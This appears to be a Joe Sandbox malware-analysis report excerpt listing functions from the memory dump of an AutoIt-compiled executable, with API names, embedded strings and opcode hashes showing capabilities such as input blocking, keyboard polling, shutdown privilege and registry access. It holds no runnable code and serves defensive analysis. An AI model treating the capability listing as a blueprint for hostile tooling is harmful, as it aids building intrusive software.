                                                                                Similarity
                                                                                • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                • String ID: *$.$.
                                                                                • API String ID: 2518042432-2112782162
                                                                                • Opcode ID: 10686662bc6c287608bb1927b489f0d8a7225314f89d29ff6f04aab4d96db585
                                                                                • Instruction ID: 4246b969998e7217e19e8dc07396b038b7eb1b915fdea9886f0b43b049de270d
                                                                                • Opcode Fuzzy Hash: 10686662bc6c287608bb1927b489f0d8a7225314f89d29ff6f04aab4d96db585
                                                                                • Instruction Fuzzy Hash: 6251F122F11A9584FB61EBB6A8009FDA7A4FF44BC9F944535CE0D17B89DE38D0629320
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: CloseControlCreateDeviceFileHandle
                                                                                • String ID: 0
                                                                                • API String ID: 33631002-4108050209
                                                                                • Opcode ID: 122fac756a3aebd614dbe24bd4d9d3fcd08661cb9d9b68eb4b308195107418d6
                                                                                • Instruction ID: 6b12dbae48e8a9aee013ceaa16bd651491134674f1a568b22905f2d3fcda6a37
                                                                                • Opcode Fuzzy Hash: 122fac756a3aebd614dbe24bd4d9d3fcd08661cb9d9b68eb4b308195107418d6
                                                                                • Instruction Fuzzy Hash: 7D2162326187C0C6D3709F21E884A9AB7A4F7857A4F544229DB9D43B98DF3CD555CB00
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: System$AdjustErrorExitInitiateLastLookupPowerPrivilegePrivilegesShutdownStateTokenValueWindows
                                                                                • String ID: SeShutdownPrivilege
                                                                                • API String ID: 2163645468-3733053543
                                                                                • Opcode ID: d91431930fad3db0e3d1089491ea6c9a4476952d79cc7edd8ba2b1494bd95168
                                                                                • Instruction ID: cb0a970a377820862435e56fffc9c356b4ab51940470578c24a3b47217401721
                                                                                • Opcode Fuzzy Hash: d91431930fad3db0e3d1089491ea6c9a4476952d79cc7edd8ba2b1494bd95168
                                                                                • Instruction Fuzzy Hash: 5611B233B1868282E770BB359C406AEE251AFC4760F854136E54D87999DF3CD8299750
                                                                                APIs
                                                                                Strings
                                                                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF79F895C43
                                                                                Similarity
                                                                                • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                • API String ID: 389471666-631824599
                                                                                • Opcode ID: a6f712f19902253ba7949c04243615cc0ab49cc8bc5c14b6f720c4296af9f677
                                                                                • Instruction ID: 034f69c4464276c948fd6e4a1d635c88e414d8a39f363c037771d9bcc679a60e
                                                                                • Opcode Fuzzy Hash: a6f712f19902253ba7949c04243615cc0ab49cc8bc5c14b6f720c4296af9f677
                                                                                • Instruction Fuzzy Hash: DC113A32A18B82A6EB64AB36DA547F9B3A4FB44355F804135C64D86A54EF3CF0B4D720
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: GetModuleHandleExW$kernel32.dll
                                                                                • API String ID: 2574300362-199464113
                                                                                • Opcode ID: 9d631b409b72dc16789edb0ad8e091fb1f9f1d2362d8f0f21b849f1d793f88a0
                                                                                • Instruction ID: 43be5e0c8a7131392305ea7febdac144b19c7982eaea8dbfe7bb47d827ea58ca
                                                                                • Opcode Fuzzy Hash: 9d631b409b72dc16789edb0ad8e091fb1f9f1d2362d8f0f21b849f1d793f88a0
                                                                                • Instruction Fuzzy Hash: 97E0ED25E15B4681EF24AB35E8543F863E0FB18B68FC80435D91D85358EF7CD598C351
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Init_thread_footer
                                                                                • String ID: Variable must be of type 'Object'.
                                                                                • API String ID: 1385522511-109567571
                                                                                • Opcode ID: 09b0c8642434f20ce4b814200726c115a0bcc0e38a9d6de865f3abdb52dfbc80
                                                                                • Instruction ID: bcb6ebc8e85766062ae52767812798c15ddd887e98bac5ed1edc26c73a8ec513
                                                                                • Opcode Fuzzy Hash: 09b0c8642434f20ce4b814200726c115a0bcc0e38a9d6de865f3abdb52dfbc80
                                                                                • Instruction Fuzzy Hash: 2AC2A532A08AC286EBB0EF25D440AF9B361FB44B94F945132DA5D57795CF3DE4A1E320
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                • String ID:
                                                                                • API String ID: 1083639309-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: Init_thread_footer
                                                                                • String ID:
                                                                                • API String ID: 1385522511-0
                                                                                Strings
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $[$\
                                                                                • API String ID: 0-3681541464
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: memcpy_s
                                                                                • String ID:
                                                                                • API String ID: 1502251526-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: AdjustConcurrency::cancel_current_taskErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                • String ID:
                                                                                • API String ID: 2278415577-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                • String ID:
                                                                                • API String ID: 3429775523-0
                                                                                Strings
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .
                                                                                • API String ID: 0-248832578
                                                                                APIs
                                                                                • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF79F8A475C,?,?,00000000,00007FF79F8A47D9,?,?,?,?,?,00007FF79F8F2210), ref: 00007FF79F8ABF3F
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Time$FileSystem
                                                                                • String ID: GetSystemTimePreciseAsFileTime
                                                                                • API String ID: 2086374402-595813830
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: ExceptionRaise_clrfp
                                                                                • String ID:
                                                                                • API String ID: 15204871-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: Internet$AvailableDataFileQueryRead
                                                                                • String ID:
                                                                                • API String ID: 599397726-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: Find$CloseFileFirst
                                                                                • String ID:
                                                                                • API String ID: 2295610775-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: ErrorFormatLastMessage
                                                                                • String ID:
                                                                                • API String ID: 3479602957-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                                                • String ID:
                                                                                • API String ID: 81990902-0
                                                                                Strings
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: a/p$am/pm
                                                                                • API String ID: 0-3206640213
                                                                                Strings
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Variable is not of type 'Object'.
                                                                                • API String ID: 0-1840281001
                                                                                Strings
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: no error
                                                                                • API String ID: 0-1106124726
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: InputSend
                                                                                • String ID:
                                                                                • API String ID: 3431551938-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: mouse_event
                                                                                • String ID:
                                                                                • API String ID: 2434400541-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: BlockInput
                                                                                • String ID:
                                                                                • API String ID: 3456056419-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: NameUser
                                                                                • String ID:
                                                                                • API String ID: 2645101109-0
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: 0
                                                                                • API String ID: 3215553584-4108050209
                                                                                Strings
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @
                                                                                • API String ID: 0-2766056989
                                                                                Similarity
                                                                                • API ID: Concurrency::cancel_current_task
                                                                                • String ID:
                                                                                • API String ID: 118556049-0
                                                                                • Opcode ID: 03c842504c7de61de67b00940c9f69ee6dc3e6ca5c43510269113482fa0a35cf
                                                                                • Instruction ID: 6a53d550e14b4f6b3c5c52eb953652bd72801ed7c279f3a04f2acb7639fecf9e
                                                                                • Opcode Fuzzy Hash: 03c842504c7de61de67b00940c9f69ee6dc3e6ca5c43510269113482fa0a35cf
                                                                                • Instruction Fuzzy Hash: 2D52CF72B0868289EBA0EF75D0447FCA3A6EB44B98F904231DE1D57BD9CE38E465D350
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID:
                                                                                • API String ID: 3215553584-0
                                                                                Similarity
                                                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                • String ID:
                                                                                • API String ID: 3521893082-0
                                                                                Similarity
                                                                                • API ID: ErrorMode$DriveType
                                                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                • API String ID: 2907320926-4222207086
                                                                                Similarity
                                                                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                • String ID:
                                                                                • API String ID: 1996641542-0
                                                                                Similarity
                                                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                • String ID: tooltips_class32
                                                                                • API String ID: 698492251-1918224756
                                                                                Similarity
                                                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                • String ID: @
                                                                                • API String ID: 3869813825-2766056989
                                                                                Similarity
                                                                                • API ID: wcscat$FileInfoQueryValueVersion$Sizewcscpywcsstr
                                                                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                • API String ID: 222038402-1459072770
                                                                                Similarity
                                                                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreenwcscat
                                                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                • API String ID: 2091158083-3440237614
                                                                                • Opcode ID: 7c2f099bf0a5769a0aea507f3e3fb0e9d810cef93c6a9b2b7ff31669fef11a09
                                                                                • Instruction ID: 84bf3f6985eed2d3f29043683f186b98fd7cbdb7119b20da2b94087e6540645a
                                                                                • Opcode Fuzzy Hash: 7c2f099bf0a5769a0aea507f3e3fb0e9d810cef93c6a9b2b7ff31669fef11a09
                                                                                • Instruction Fuzzy Hash: A2715236618AC296EB60EB25E8547EDA720FB847A8FC00132DA4D47AADDF7CD549C710
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: SendString$BuffCharDriveLowerType
                                                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                • API String ID: 1600147383-4113822522
                                                                                • Opcode ID: c97716080e4f543c9a20482f6ee2b28a1c64bce64f7816063184408ee6a3b085
                                                                                • Instruction ID: 3de4b2baafcf2e4036fd21f8bacd00723729960479810cc0f61dabf861fcd4be
                                                                                • Opcode Fuzzy Hash: c97716080e4f543c9a20482f6ee2b28a1c64bce64f7816063184408ee6a3b085
                                                                                • Instruction Fuzzy Hash: F481D522B14A9289EFA0AB36D8516FCA3B1FB64B94BE00432CE1D87794DF3CD555D360
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Variant$ClearInit
                                                                                • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                • API String ID: 2610073882-3931177956
                                                                                • Opcode ID: 71cb67d8980752d71d61beca9315e30f05edd3d223294706e17d030598d61897
                                                                                • Instruction ID: 328d453069b55577d5af323ebe48dc4ecfb98f743e3551598aba0d25c6b1aed7
                                                                                • Opcode Fuzzy Hash: 71cb67d8980752d71d61beca9315e30f05edd3d223294706e17d030598d61897
                                                                                • Instruction Fuzzy Hash: 56027432A08A828AE7B8BB75C0559FCA361FF54B44F854535CA0E47B94DF3DE560E3A0
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: CurrentDirectoryTime$File$Localwcscat$Systemwcscpy
                                                                                • String ID: *.*
                                                                                • API String ID: 1111067124-438819550
                                                                                • Opcode ID: 98a71cfb6502df9087812816f04c928264b270ce88f96a393908c63e275b4126
                                                                                • Instruction ID: 93e40b72deefb6c687c6628cd8b5ffa8726be9d0381885d6fa744b5524b94c89
                                                                                • Opcode Fuzzy Hash: 98a71cfb6502df9087812816f04c928264b270ce88f96a393908c63e275b4126
                                                                                • Instruction Fuzzy Hash: 85718F32618BC695DBA0EF32D8405EAB320FB94B88F801031DA4E47765DF3DE56AD750
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                • String ID:
                                                                                • API String ID: 2598888154-3916222277
                                                                                • Opcode ID: dea97f0d0ad0f9214e770fe855ba7d83dc888621a1f275c7b89ba2b07fbcc766
                                                                                • Instruction ID: 0bd7f56fd6bedd57aacb8f9f15256b5443ee191c69558ef03b74f05924a928ab
                                                                                • Opcode Fuzzy Hash: dea97f0d0ad0f9214e770fe855ba7d83dc888621a1f275c7b89ba2b07fbcc766
                                                                                • Instruction Fuzzy Hash: C3517776B15680CBE760DF75E844AADB7B1F748B98F408125EE4997B18CF38E4158B10
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                • String ID: NULL Pointer assignment
                                                                                • API String ID: 2706829360-2785691316
                                                                                • Opcode ID: f387a50e6818b73d110b12cd73088d785cdd73093c11eac48bc39c6d5f3c3ae3
                                                                                • Instruction ID: 4b4f168176793211fb1daabe52bdb024a8e8c6ece22c2c46ca7f6035cc5808b2
                                                                                • Opcode Fuzzy Hash: f387a50e6818b73d110b12cd73088d785cdd73093c11eac48bc39c6d5f3c3ae3
                                                                                • Instruction Fuzzy Hash: 77517122B15A9289EB50EF71D880AFC6374FF84B99F814032DE0E8B659DF78D045C350
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(?,?,?,00000000,?,?,?,00007FF79F90FD7B), ref: 00007FF79F911143
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: BuffCharUpper
                                                                                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                • API String ID: 3964851224-909552448
                                                                                • Opcode ID: 48ce5f8ab7038dd94976e3b00d3167ae2925137fb7b03817e14e3f39c5b841c4
                                                                                • Instruction ID: d8ee71e29e400b7adb844d624a7d084991174c049c8cbc77f4c9a975c0b48b64
                                                                                • Opcode Fuzzy Hash: 48ce5f8ab7038dd94976e3b00d3167ae2925137fb7b03817e14e3f39c5b841c4
                                                                                • Instruction Fuzzy Hash: 23E18112B08AD795EA70EB7598402F8A394BB50BA8BC44531C91DC77DCEE3CE9968320
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: CurrentDirectory$AttributesFilewcscat$wcscpy
                                                                                • String ID: *.*
                                                                                • API String ID: 4125642244-438819550
                                                                                • Opcode ID: 1b6dd8a96d898a21e7a73211ee0a4e3b10aba06561d9a5e90c26a3235988e558
                                                                                • Instruction ID: f3158d1ce8b417f36cee216409f026944fdcacef534282f94f9804b50a04910e
                                                                                • Opcode Fuzzy Hash: 1b6dd8a96d898a21e7a73211ee0a4e3b10aba06561d9a5e90c26a3235988e558
                                                                                • Instruction Fuzzy Hash: 2281B022B28AC28AEBA0EF21D941AFDA360FB54B84FC00036DA4E47794DF7CD565D750
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: LoadStringwprintf
                                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                • API String ID: 3297454147-3080491070
                                                                                • Opcode ID: 921b602f5fcb54eacd7a62b3ce9e0f2e08e995aee376e847d7660b2710a32505
                                                                                • Instruction ID: 569c26e4a147c439543ee5f5337630b5f8873bad6fdde5e10aa507de67fbc93f
                                                                                • Opcode Fuzzy Hash: 921b602f5fcb54eacd7a62b3ce9e0f2e08e995aee376e847d7660b2710a32505
                                                                                • Instruction Fuzzy Hash: 61617221B18AD296EB60FB30D841AECA360FBA4754FC00032EA5D57B99DF7CE556C760
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: HandleLoadModuleString$Messagewprintf
                                                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                • API String ID: 4051287042-2268648507
                                                                                • Opcode ID: 6f60d895e456e1bcae49e483a71499a5f57f9936a6ffa7df15260821f561c8be
                                                                                • Instruction ID: f3deb9552e162f0c53f7a1fe4f3b21d4888de116b918209d485c1e8c756420e2
                                                                                • Opcode Fuzzy Hash: 6f60d895e456e1bcae49e483a71499a5f57f9936a6ffa7df15260821f561c8be
                                                                                • Instruction Fuzzy Hash: EC51C021B28AD291EB60FB30E8419EDA361FF94754BC00032E92D57B9ADF7CE556C750
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Thread$Window$CurrentMessageProcessSendSleep$ActiveAttachDialogEnumFindInputTimeWindowstime
                                                                                • String ID: BUTTON
                                                                                • API String ID: 3935177441-3405671355
                                                                                • Opcode ID: f78108109216f5a9e13feac809e7b4bcbb9376684aa6c7b0e89a3c685e053ef5
                                                                                • Instruction ID: 8651f864c80a7bdb7909e3258378474b570db1c79c6c67dd01e2728d8dc86e4a
                                                                                • Opcode Fuzzy Hash: f78108109216f5a9e13feac809e7b4bcbb9376684aa6c7b0e89a3c685e053ef5
                                                                                • Instruction Fuzzy Hash: 70315025E0DAC782FB70BB34EC54BF5A3519F84768FC55031D90E8A6A8DE2CA4999730
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: Destroy$AcceleratorKillTableTimerWindow
                                                                                • String ID:
                                                                                • API String ID: 1974058525-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: Window$ItemMoveRect$Invalidate
                                                                                • String ID:
                                                                                • API String ID: 3096461208-0
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
                                                                                • String ID: %s%u
                                                                                • API String ID: 1412819556-679674701
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: ClassName$Window$Text$BuffCharRectUpperwcsstr
                                                                                • String ID: ThumbnailClass
                                                                                • API String ID: 4010642439-1241985126
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                • String ID: P
                                                                                • API String ID: 1268354404-3110715001
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: LoadStringwprintf
                                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                • API String ID: 3297454147-2391861430
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
                                                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                • API String ID: 3030280669-22481851
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Window$CreateMessageObjectSend$AttributesCompatibleDeleteDestroyLayeredLongMovePixelSelectStock
                                                                                • String ID: static
                                                                                • API String ID: 3821898125-2160076837
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove
                                                                                • String ID: :$\$\??\%s
                                                                                • API String ID: 3827137101-3457252023
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: State$Async$Keyboard
                                                                                • String ID:
                                                                                • API String ID: 541375521-0
                                                                                APIs
                                                                                  • Part of subcall function 00007FF79F876838: CreateFileW.KERNELBASE ref: 00007FF79F8768A2
                                                                                  • Part of subcall function 00007FF79F894380: GetCurrentDirectoryW.KERNEL32(?,00007FF79F87E817), ref: 00007FF79F89439C
                                                                                  • Part of subcall function 00007FF79F8756D4: GetFullPathNameW.KERNEL32(?,00007FF79F8756C1,?,00007FF79F877A0C,?,?,?,00007FF79F87109E), ref: 00007FF79F8756FF
                                                                                • SetCurrentDirectoryW.KERNEL32 ref: 00007FF79F87E8B0
                                                                                • SetCurrentDirectoryW.KERNEL32 ref: 00007FF79F87E9FA
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: CurrentDirectory$CreateFileFullNamePathwcscpy
                                                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                • API String ID: 2207129308-1018226102
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                • API String ID: 636576611-1287834457
                                                                                Similarity
                                                                                • API ID: Icmp$CleanupCloseCreateEchoFileHandleSendStartupgethostbynameinet_addr
                                                                                • String ID: 5$Ping
                                                                                • API String ID: 1486594354-1972892582
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                • API String ID: 3215553584-2617248754
                                                                                Similarity
                                                                                • API ID: HandleLoadMessageModuleStringwprintf
                                                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                • API String ID: 4007322891-4153970271
                                                                                Similarity
                                                                                • API ID: MessageSend$CtrlParent$ClassName
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 2573188126-1403004172
                                                                                Similarity
                                                                                • API ID: wcscpy$CleanupStartupgethostbynamegethostnameinet_ntoa
                                                                                • String ID: 0.0.0.0
                                                                                • API String ID: 2479661705-3771769585
                                                                                Similarity
                                                                                • API ID: ItemMenu$InfoWindow$CheckCountCtrlEnabledFocusLongMessagePostProcRadio
                                                                                • String ID:
                                                                                • API String ID: 2672075419-0
                                                                                Similarity
                                                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                • String ID:
                                                                                • API String ID: 2156557900-0
                                                                                Similarity
                                                                                • API ID: Virtual$MessagePostSleepThread$AttachCurrentInputProcessWindow
                                                                                • String ID:
                                                                                • API String ID: 685491774-0
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                • API String ID: 0-1603158881
                                                                                Similarity
                                                                                • API ID: Variant$Init$Clear
                                                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
                                                                                • API String ID: 3467423407-1765764032
                                                                                Similarity
                                                                                • API ID: FreeString$FileFromLibraryModuleNamePathQueryType
                                                                                • String ID:
                                                                                • API String ID: 1903627254-0
                                                                                • Opcode ID: 598b5a242d4ad7e8ea74ab1cb47f7436f773884321b066f1e5bf024af7697886
                                                                                • Instruction ID: a3021e36845c284c27aa88142d04cd38c94a75f24951e68865433cf3c1ebde90
                                                                                • Opcode Fuzzy Hash: 598b5a242d4ad7e8ea74ab1cb47f7436f773884321b066f1e5bf024af7697886
                                                                                • Instruction Fuzzy Hash: 0A025E22A18A8286DB60EF39D4441FDA770FB84BA4F944132EB5E87B68DF3CD549C711
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Similarity
                                                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                • String ID:
                                                                                • API String ID: 1957940570-0
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageReleaseScreenSendText
                                                                                • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                • API String ID: 3721556410-2107944366
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                • String ID: 2$P
                                                                                • API String ID: 93392585-1110268094
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: IconLoad_invalid_parameter_noinfo
                                                                                • String ID: blank$info$question$stop$warning
                                                                                • API String ID: 4060274358-404129466
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Close$BuffCharConnectDeleteOpenRegistryUpperValue
                                                                                • String ID:
                                                                                • API String ID: 50796853-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                • String ID:
                                                                                • API String ID: 3864802216-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID:
                                                                                • API String ID: 3215553584-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                • String ID:
                                                                                • API String ID: 2550207440-0
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: ObjectSelect$BeginCreatePath
                                                                                • String ID:
                                                                                • API String ID: 3225163088-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: MessageSendWindow$Enabled
                                                                                • String ID:
                                                                                • API String ID: 3694350264-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                • String ID:
                                                                                • API String ID: 87235514-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                • String ID:
                                                                                • API String ID: 87235514-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: Internet$CloseConnectErrorEventHandleHttpLastOpenRequest
                                                                                • String ID:
                                                                                • API String ID: 3401586794-0
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: From$ErrorModeProg$AddressCreateFreeInstanceProcStringTasklstrcmpi
                                                                                • String ID: DllGetClassObject
                                                                                • API String ID: 668425406-1075368562
                                                                                APIs
